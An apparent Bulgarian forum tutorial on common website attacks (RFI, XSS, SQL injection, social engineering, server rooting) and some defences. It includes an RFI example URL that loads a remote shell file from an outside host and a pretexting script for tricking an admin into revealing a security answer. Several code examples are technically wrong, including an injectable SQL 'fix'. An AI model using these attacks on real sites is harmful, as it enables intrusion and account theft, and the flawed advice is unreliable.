Добре дошъл(а) в SmyleBG!
Регистрацията е препоръчителна за да ползвате екстрите както и пълната функционалност на сайта и отнема само минута!
Моля прочетете и спазвайте правилата ни при регистрацията си за да бъде всичко на ред занапред!
Като гост виждате само 2% от съдържанието на форума!
Заповядайте при нас!
ИндексHomeВъпроси/ОтговориРегистрирайте сеВход
Начало
Полезни
Профил
От форума
Администрация

Share | .
 

 Начините за атака и защита на сайт

Предишната тема Следващата тема Go down 
АвторСъобщение
SmyleBG
✰✰✰✰✰✰
✰✰✰✰✰✰
avatar

Брой мнения : 153
Последно влизане : 23.05.2013
Местожителство : BG

ПисанеЗаглавие: Начините за атака и защита на сайт   Съб 8 Юни - 4:06:36

Начините за атака на 1 сайт най-често са: RFI, XSS, SQL INJECTION, Social engineering и др. Така сега да ви обясня за всяка една от тях:

1.RFI: този метод позволява да се качи файл на вашия сайт. За да ви го обясня по-добре ще ви дам пример:
Имате index.php?user=admin
И вие не валидирате самия $_GET параметър, а го извиквате направо:

<?php
echo $_GET['user'];
?>

Хакера просто премахва потребителя admin, и дава път към неговия файл, така автоматично се зарежда той.
Пример:
index.php?user=http://opty.hit.bg/shell.txt? - този линк е към шел(това е php файл, които когато се качи на сървър ти дава достъп до файловете в него) на 1 "хакер". Така по принцип този метод използва фунцията на apache да отваря съдържанието на външни линкове. Във всички хостинг комании(читави) това е изключено, в новите версии на хампрр също, така че е почти невъзможно да ви хакнат по този метод, просто ви го пиша за информация

2.XSS: това е метод които позволява да се изпълни javascript в сайта. След като го прати на някой потребител който се е логнал, той му взима coocki-то, и така се логва от негово име.

3.SQL Injection: метод при които се изпълнява SQL заявка без ваше поволение. Как да се предпазим:

Валидирате $_GET параметъра(ако има такъв). Пример с ид:

url: [You must be registered and logged in to see this link.]

Проверяваме дали id е изпратено и дали самото ид е валидно.

$rs = mysql_query('SELECT * FROM table WHERE id="'.$id.'"');
if(mysql_num_rows($rs)==0 AND !isset($_GET['id'])){
//тук може да го запишете в лог файл ако желаете
}

Когато от форма записвате в база данни, и след това я изкарвате някъде я валидирайте с addslashes(); , trim(); и т.н.

4.Social Engineering: този метод е използван от много известни навремето хакери като Кевин Митник.Той не е от типа "насилствено хакване", той е по-скоро психологически. Ще ви дам пример да ме разберете по-добре:
Искате да вземете паролата на администратора в някои форум, давате на забравена парола и виждате, че ви пита примерно "Какъв домашен любимец имам?".

Намирате скайпа или накъква връзка с администратора.
Правиш си скайп sexy_girl_92
Започваш да си пишеш с него, и случайно го питаш какъв домашен любимец има той, пробваш го, и хоп влизаш в акаунта му.
Това е пример, вече малко хора дават истинските си данни, но навремето е бил много успешен метод.

Има и още хитри начини за хакване които трябва да се пазим, като например:
Роотване на целия сървър на сайта ви: това също е чест метод. Примерно си избирам да хакна сайта vbox7.com , но тъй като системата му е желязна за мен виждам кой друг сайт се хоства на неговия сървър. Хаквам него ако мога, след това качвам шел, и от там вече има различни начини за придобиване на достъп до останалите, няма да се впускам в подробности за да не образовам прекалено пишман-хакерите. За това също е важно да изберете сигурен хостинг.

Последно да ви кажа за готовите системи: Ако ползвате готови системи разбира се нивото на сигурност е много по-голямо, но все пак да не забравим, че системата е разглеждана от много хора които разбират, и така е много по-трудно да се защити. Повечето хора, които дремят по часове пред някоя по-известна система търсейки дупка, след като намерят или се хвалят нейде или пък си има цели сайтове за exploit-и. Просто напишете в гугъл името на системата + exploit (пример: е107 exploit) и потърсете дали за вашата няма, а ако има потърсете съответното закърпване.

Има още куп хитрости, които хората са измислили, но това са главните за който се сещам. Дано съм ви бил от полза, и ако имате нещо да допълните или да ме поправите ще съм ви благодарен.

_____________________________________________________________________________________
Покрепяйте ни всеки ден [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.] [You must be registered and logged in to see this link.]
Ето и нашата статистика на посещенията за последните 24 часа [You must be registered and logged in to see this link.]
Върнете се в началото Go down
http://smyle.board.st
 

Начините за атака и защита на сайт

Предишната тема Следващата тема Върнете се в началото 
Страница 1 от 1

 Similar topics

-
» Играчки за големи момчета
» Трикове срещу крадци
» Саморъчно правене на лепенки
» Имате ли интерес към сайт съдържащ информация за нашите мотори?
» още един сайт за части за симсон

Permissions in this forum:Не Можете да отговаряте на темите
 :: Уроци, полезни, съвети, обмяна на опит... :: Защита на сайтове-